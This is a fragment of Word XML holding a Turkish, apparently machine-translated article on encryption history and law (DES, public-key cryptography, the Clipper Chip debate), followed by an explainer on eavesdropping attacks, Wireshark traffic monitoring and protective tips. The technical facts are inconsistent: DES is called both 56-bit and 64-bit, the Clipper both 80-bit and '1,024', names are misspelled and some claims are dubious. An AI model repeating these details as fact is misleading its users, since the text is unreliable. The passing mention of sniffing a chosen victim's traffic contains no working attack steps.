    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>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1934 Federal İletişim Kanunu</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Telefon ve telgrafları gizli dinleyicilerden koruyan federal yasalar, öncelikle 1934 tarihli Federal İletişim Yasası'ndan türetilmiştir. Kanun, bu tür iletişimleri göndermekle ilgilenen tarafların, içeriği ile ilgisi olan herhangi bir şeyi yayınlamasını veya yayınlamasını yasaklamaktadır. Bir istisna yapar ve mahkemenin meşru bir mahkeme celbi yayınlamış olup olmadığını açıklama izni verir. Yasa dışı bir telgrafla toplanan hiçbir materyal kabul edilemez ve federal mahkemelerde delil olarak sunulmaya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Veri Şifreleme Standard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ilgisayar veri koruma şifreleme prosedürlerini belirten Ulusal Standartlar Bürosu Veri Şifreleme Standardı (DES), 1977'den beri federal bir standart olmuştur. DES algoritmasının kullanımı, Federal Rezerv Sisteminin üye bankaları tarafından yürütülenler de dahil olmak üzere, Elektronik Fon Transferini içeren ABD hükümetinin tüm finansal işlemleri için zorunlu hale getirild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S, donanıma uygulandığında yüksek hızlarda çalışan, karmaşık, doğrusal olmayan bir şifreleme algoritmasıdır. DES algoritması, 56 bit anahtarlama parametresi eylemi altında 64 bit düz metin, 64 bit şifreleme metnine dönüştürür. Anahtar, algoritma tarafından doğrudan kullanılan 56 bitin her biri rastgele olacak şekilde üretilir. Şifreli veri yetkilendirilmiş bir kullanıcı grubunun her üyesi, onu kullanmak için verileri şifrelemek için kullanılan anahtara sahip olmalıdır. Bu teknik algoritmayı güçlendirir ve analize karşı dayanıklı kılar.</w:t>
      </w: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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Geleneksel Veri Şifreleme Yöntemlerindeki Loopholes</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DES, dönüşümü kontrol eden ve bilgileri şifrelenmiş koda dönüştüren 64 bit bir anahtar kullanır. Neredeyse sonsuz sayıda olası anahtar vardır, bu nedenle en hızlı bilgisayarların bile tüm olası anahtarları denemek için yüzyıllara ihtiyacı olacak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Geleneksel şifreleme yöntemlerinde belirgin bir boşluk vardır: mesajları kodlamak ve kodlarını çözmek için tek bir anahtara bağımlı olmaları. Kodlanmış mesajların gizliliği her zaman dekoder anahtarının ne kadar dikkatli tutulduğunun bir fonksiyonudur. Ancak, insanlar mesaj alışverişinde bulunduğunda, anahtarı değiştirmenin bir yolunu bulmaları gerekir. Bu hemen anahtarı durdurma için savunmasız hale getirir. Şifreleme büyük ölçekte kullanıldığında sorun daha karmaşık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Diffle'nın Çözümü</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u sorun teorik olarak yaklaşık 20 yıl önce, Whitfield Diffle adlı bir MIT öğrencisi bu boşluğu tıkamak için yola çıktığında çözüldü. Diffle'ın çözümü her kullanıcıya iki ayrı anahtar, bir açık anahtar ve bir de özel anahtar vermekti. Açık anahtar yaygın olarak dağıtılabilir ve özel anahtar yalnızca kullanıcı tarafından biliniyordu. Her iki tuşla kodlanmış bir mesaj diğeriyle deşifre edilebilir. Bir kişi birisinin ortak anahtarıyla karıştırılmış bir mesaj gönderirse, yalnızca o kişinin özel anahtarıyla kodu çözül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Clipper Tartışması</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1993 yılının Nisan ayında, Clinton yönetimi, Ulusal Güvenlik Ajansı ile geliştirilen şifreleme teknolojisi için yeni bir standart önerdi. Yeni standart Escrowed Encryption Standard adlı bir plandır. Standartlara göre, bilgisayar yongaları bilgileri şifrelemek için Skipjack adlı gizli bir algoritma kullanır. Clipper Chip, ses iletişimini şifrelemek için tüm telefonlara, bilgisayar modemlerine ve faks makinelerine kurulmak üzere tasarlanmış yarı iletken bir cihaz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Clipper Chip</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Clipper Chip, 80-bit şifreleme şeması kullanan ve normal bir kullanım ömrü içinde günümüz bilgisayarlarıyla çatlamak imkansız olduğu düşünülen güçlü bir algoritmayı birleştiriyor. Çipte ayrıca yalnızca devlet kurumları için mevcut olacak gizli hükümet ana anahtarları da var. İletişimi engellemek için mahkeme emri şeklinde uygun yetkilendirme gerekli olacakt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Geleneksel veri şifreleme yongaları ve Clipper Chip arasındaki fark, Clipper'ın bir kanun uygulayıcı erişim alanı (LEAF) içermesidir. LEAF, kullanıcının verileriyle birlikte iletilir ve hükümetin ana anahtarı altında şifrelenmiş olan kullanıcının bireysel yongasının ve kullanıcının anahtarının kimliğini içerir. Bu, gizlice dinleyenlerin, kullanıcının anahtarını bularak kodu kırmasını engelleyebilir. Yetkili bir kurum bireysel çipin kimliğini bildiğinde, doğru ana anahtarı geri alabilir, kullanıcının anahtarının kodunu çözmek için kullanabilir ve böylece orijinal şifreli bilginin kodunu çözebil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Uzun Anahta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Clipper, 1.024 değerde olabilecek uzun bir anahtar kullanır. Clipper'ın kodunu kırmanın tek yolu mümkün olan her anahtarı denemekt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Tek bir süper bilgisayarın, Clipper'ın olası tüm anahtarlarını kullanması bir milyar yıl alacaktır. Clipper-Chip planının rakipleri birkaç defa uygulanmasını eleştird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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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t>Teröristler ve uyuşturucu satıcıları, Clipper Chip'e sahip olmaları durumunda telefonları rahatsız ederdi. Ayrıca, kendi çiplerini kullanabilirler.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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Yabancı müşteriler, iletişiminin ABD devlet kurumları tarafından ele geçirilebileceğini bilselerdi, Amerikan üreticilerinden ekipman satın almazlardı.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>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shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>“Arka kapı” sisteminin bütünlüğü, acımasız federal çalışanlar tarafından tehlikeye sokulabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>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Uzak ihtimal, uzman bir kriptologun bir şekilde kodu kırabilmes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Tavsiye Edilen Eylem</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Bilgisayar endüstrisi ve sivil liberterlerin muhalefetine rağmen, devlet kurumları, sınıflandırılmamış iletişim için Clipper teknolojisinde aşama yapıyor. Clipper'ın ticari kullanımı hala tamamen isteğe bağlıdır ve devlet dışındaki herhangi bir kuruluş tarafından benimseneceğine dair hiçbir garanti yoktur. Yine de, binlerce Clipper donanımlı telefon, devlet kullanımına açık durumda. Adalet Bakanlığı, polis ve FBI’nın emri olmadan konuşmaları dinlemesini önleyecek önerileri değerlendiriyo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Gizlilikle ilgili bu endişelere yönelik olası bir çözüm, şifre çözme anahtarını iki veya daha fazla bölüme ayırmak ve ayrı devlet kurumları için mütevelli heyeti vermek.</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Teoride bu, bir mesajın ele geçirilmesinden önce birkaç kişi ve kurumun işbirliğini gerektirecektir. Bu çözüm gizli bir ceza soruşturması yapmak için gereken gizliliği tehlikeye atabilir, ancak Adalet Bakanlığı bunun uygulanabilirliğini araştırıyo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 xml:space="preserve">Hiçbir veri şifreleme yöntemi, bireysel mahremiyeti ve toplumun suç faaliyetlerini durdurma arzusunu her zaman koruyamaz. Elektronik Fon Transfer sistemleri ve bilgi otoyolu, özel haberleşmeye olan ihtiyacı her zamankinden daha önemli hale getirdi. Toplumun uyuşturucu ve terörle ilgili sorunları, bireyin mahremiyet hakkı, toplumun kendisini koruma </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ihtiyacı ve herkesin Büyük Kardeş hükümet araçları korkusuyla ilgili hassas dengeyi vurgulayarak sorunları karmaşıklaştırmakta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Yazar Biyografileri</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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Edward H. Freeman: </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Edward H. Freeman, West Hartford CT'de avukat, öğretmen ve öğretim görevlisidir ve en son büyük bir sigorta şirketi olan veri işleme alanında 15 yıllık bir deneyime sahiptir. Central Connecticut State University'de yarı zamanlı bir öğretim üyesid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color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>EK KONU</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E"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6347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t xml:space="preserve">EAVESDROPPİNG NEDİR? </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="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Eavesdropping, Türkçeye ‘Telekulak’ olarak çevrilmektedir. İlk olarak İngiltere’de 1769 yılında çıkan kanun ile birlikte asıl manası olan ‘Saçaklı Saldırı’ olarak kayıtlara geçmiştir. Böyle anılmasının sebebi, eskiden insanlar birbirlerini dinlemek için evlerinin saçaklarına gizlenir ve oradan içeride olup biteni dinlemeye çalışırlarmış. Günümüzde ise eavesdropping; akıllı telefonlar, bilgisayarlar, güvensiz ağ bağlantıları, SSL sertifikası veyahut SSH(güvenli kabuk)’ ı bulunmayan siteler aracılığıyla kötü niyetli kişi veya kişiler tarafından dinlenilmesidir. Özet olarak söyleyecek olursak, insanın özeli kabul edilen cihazlara, yazılım veya program yüklenerek, uzaktan erişim sağlayıp istem dışı olarak dinleme yapılmasıdı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 xml:space="preserve">Bir ağ veya kanal üzerinden iletilen verinin, kötü niyetli üçüncü kişiler tarafından araya girilerek alınmasıdır. Bu saldırı tipinde, hatta kaynaktan hedefe giden verinin arada elde edilip, değiştirilerek hedefe gönderilmesi bile mümkündür. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">Saldırının </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>sanıldığının aksine çok farklı uygulama alanı bulunmaktadır. Hiç bir bilgisayarla etkileşimi olmayan tek başına çalışan bir bilgisayar bile, mikroçip, ekran veya yazıcı gibi elektronik parçalarından yayılan elektrik veya elektromanyetik yayılım takip edilerek gizlice dinlenebilir. Bu cihazların bu tür dinlemelere olanak vermemesi için, Amerikan hükümeti 1950’li yılların ortasından başlayarak TEMPEST adında bir standart geliştirmişt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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Aktif Eavesdropping Saldırısı</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Aktif Eavesdropping ataklarında, kötü niyetli kişi, istemci ile sunucu arasında değişiklik gösterilerek ilgili yazılım veya program aracılığı ile sunucuyu veyahut istemciyi kendi istediği bir konuma yönlendirebilmektedir. Bunu yapmanın en bilindik yöntemi ise spoofing ile aldatma saldırısı düzenlemektir.</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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Pasif Eavesdropping Saldırısı</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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLine="708"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Pasif Eavesdropping ataklarında dinlenildiğinizi, izlenildiğinizi çoğu zaman fark edemeyebilirsiniz. Bunun için özel programların olmasının yanı sıra kötü niyetli bir kişi size sosyal medya üzerinden göndereceği bir link veyahut cihazınıza yükleyebileceği virüs ile sizlerin cihazınız üzerinde yaptığı her hareketi gözaltına alabilir.</w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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1"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Wireshark ile Pasif Eavesdropping</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b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLine="708"/>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Pasif dinleme ve izlemeyi gerçekleştirmek için herkesin erişebileceği, Windows ve Linux için uyumlu bir program olan Wireshark idealdir. Bu program aracılığı ile IP adresini belirlediğiniz bir kurbanın network trafiğinden, SSL sertifikasına hatta portlarına kadar takip edebilirsiniz. Wireshark programının birçok özelliğinin bulunmasının yanı sıra grafik arayüzü ile de temel düzeyde bilgisi olan kullanıcıların çok kolay kullanabileceği bir ağ analizi aracıdır. Bu özelliklerinden bazılarını sıralayacak olursak;</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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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Belirlediğiniz hedefteki paketleri tutarak sizlere sunabilir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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İstatistiksel özellikleri ile kendinize özel belirlediğiniz grafikleri size sunar.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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Filtreleme özelliği ve belirlediğiniz metriklerin renkler ile ayrılmasını sağlayarak sizleri meşakkatten kurtarır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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Ağda olan biten her şeyi bize gösterir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:num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Ücretsiz olması ve buna rağmen sunduğu özellikler ile gerçekten sağlam ve kesinlikle güvenilirdir.</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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLine="708"/>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 xml:space="preserve">Wireshark ile kendi ağ trafiğinizi de izleyip analizler gerçekleştirebilirsiniz. Bilgisayarla ve internetle ilgisi olan herkesin bu ağ analiz aracını kullanması kendisi için </w:t>
      </w:r>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>gereklidir. Ağ trafiğinizde ne olup ne bittiğini, anormal bir durumun olup olmadığını bu sayede görebilir ve çözebilirsiniz.</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0"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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4"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
        <w:t>Eavesdropping Saldırılarından Nasıl Korunulmalıdır?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
        <w:ind w:firstLine="708"/>
        <w:outlineLvl w:val="4"/>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Fiziksel Dünyada her yaptığınız ve her söylediğinizin başkaları tarafından dinlenilmesinin, izlenilmesinin ne kadar sinir bozucu olduğunu tahmin edebiliyorsunuzdur. Bir de bunun dijital dünyada başınıza geldiğini veya gelebileceğini düşünün. Durum yine aynı şekilde can sıkıcıdır. Peki, bunu engellemek imkânsız mı? Elbette ki hayır, değil. Eavesdropping saldırılarından korunmanın yolları basittir.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pP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Genel olarak kullandığınız veya E-Ticaret siteleri üzerinde mutlaka SSL sertifikası(https://) veya SSH ı bulunmasına özen gösterin. SSL sertifikası, istemci ile sunucu arasındaki verinin 128 ile 256 bit arasında şifreleme yapmasını sağlar ve girdiğiniz bilgilerin 3. kişiler tarafından izlenilmesini engeller.</w:t>
      </w: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Genel Wi-Fi ağlarından uzak durun. Bu ağlar, düpedüz tuzaktır. Herkesin bağlanabildiği ağlarda kolayca veri izlemesi yapılmasının yanı sıra, etkileşim kurduğunuz cihaz üzerinden işlemler gerçekleştirilebilir.</w:t>
      </w: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Bilmediğiniz keza güvenmediğiniz hiçbir linke tıklamayın veya girmeyin.</w:t>
      </w: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Kullandığınız cihazların güncellemelerini kontrol edin ve her zaman güncel olmasına özen gösterin. Çünkü yeni getirilen güncellemeler ile eski sürümün açıkları paylaşılmaktadır ve nelerin düzeltildiği ilan edilmektedir.</w:t>
      </w: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Sitenizin güvenliğini ve güncelliğini tam olarak sağlayın.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="0016347E" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="ListeParagraf"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="75" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:eastAsia="tr-TR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016347E">
        <w:rPr>
